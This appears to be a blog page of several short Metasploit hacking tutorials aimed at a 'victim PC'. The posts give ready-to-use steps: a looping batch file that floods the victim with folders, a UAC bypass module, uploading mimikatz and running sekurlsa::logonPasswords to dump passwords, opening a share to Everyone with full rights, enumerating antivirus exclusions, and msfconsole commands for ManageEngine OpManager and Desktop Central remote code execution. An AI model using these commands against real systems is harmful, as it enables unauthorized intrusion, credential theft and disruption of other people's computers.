How to Create unlimited Folder in Remote Victim PC using Metasploit

at 1:27 AM Friday, January 15, 2016 0 comments
Open leafpad and type the following code.

@echo off
:loop
md %random%
goto loop

Now save it as a batch file


Now Use the upload command to send Batch File to the target system.


 Now type shell to enter into Victims command prompt and execute the batch file. It will create unlimited blank folder in victim pc


Labels: ,

How to Access Unauthorized on Remote PC using Metasploit

at 4:58 AM Friday, January 8, 2016 0 comments
First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you had a remote shell with Metasploit all now use the Bypass UAC module, set the session number and exploit it

use exploit/windows/local/bypassuac_injection
msf exploit (bypassuac_injection)>set session 1

msf exploit (bypassuac_injection)>exploit


mimikatz is a tool to check Windows security. It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

First Download mimikatz windows version from here and use the upload command to send a file to the target system.


Type the following command to check  privilege
privilege::debug

Now type the following command to get users passwords in text mode.
sekurlsa::logonPasswords


Using the "net help share" command you will see that the syntax is as follows:

net share raj=(Drive name):  /GRANT:Everyone,FULL


 Start, Run dialog box and define the path of the shared folder using the format \\192.18.0.101


It will show you the prompt and type username and password, and then click OK


Now you can access the shared folder. Below is the screenshot for reference.

Labels: ,

How to Gather Information of Antivirus in Remote Victim PC using Metasploit

at 4:01 AM Sunday, January 3, 2016 0 comments
First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently includes Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use post/windows/gather/enum_av_excluded
msf exploit (enum_av_excluded)>set lhost 192.168.0.105 (IP of Local Host)
msf exploit (enum_av_excluded)>set session 1
msf exploit (enum_av_excluded)>exploit

Labels: ,

Hack Remote Windows PC using ManageEngine OpManager Remote Code Execution

at 12:15 AM Tuesday, December 22, 2015 0 comments
This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account "IntegrationUser" with administrator privileges exists. The account has a default password of "plugin" which can not be reset through the user interface. By log-in and abusing the default administrator's SQL query functionality, it's possible to write a WAR payload to disk and trigger an automatic deployment of this payload. This module has been tested successfully on OpManager v11.5 and v11.6 for Windows.

Exploit Targets
Windows 7
ManageEngine OpManager v11.6


Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/http/manage_engine_opmanager_rce
msf exploit (manage_engine_opmanager_rce)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (manage_engine_opmanager_rce)>set rhost 192.168.0.104
msf exploit (manage_engine_opmanager_rce)>exploit


Labels: ,

Hack Remote Windows PC Manage Engine Desktop Central 9 File Upload Servlet Connection Id Vulnerability

at 9:29 AM Sunday, December 20, 2015 0 comments
This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null bye at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. Please note that by default, some ManageEngine Desktop Central versions run on port 8020, but older ones run on port 8040. Also, using this exploit will leave debugging information produced by FileUploadServlet in file rdslog0.txt. This exploit was successfully tested on version 9, build 90109 and build 91084

Exploit Targets
Windows 7
ManageEngine Desktop Central 9

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/http/manageengine_connectionid_write
msf exploit (manageengine_connectionid_write)>set lhost 192.168.1.33 (IP of Local Host)
msf exploit (manageengine_connectionid_write)>set rhost 192.168.1.4
msf exploit (manageengine_connectionid_write)>exploit

Labels: ,
Subscribe to: Comments (Atom)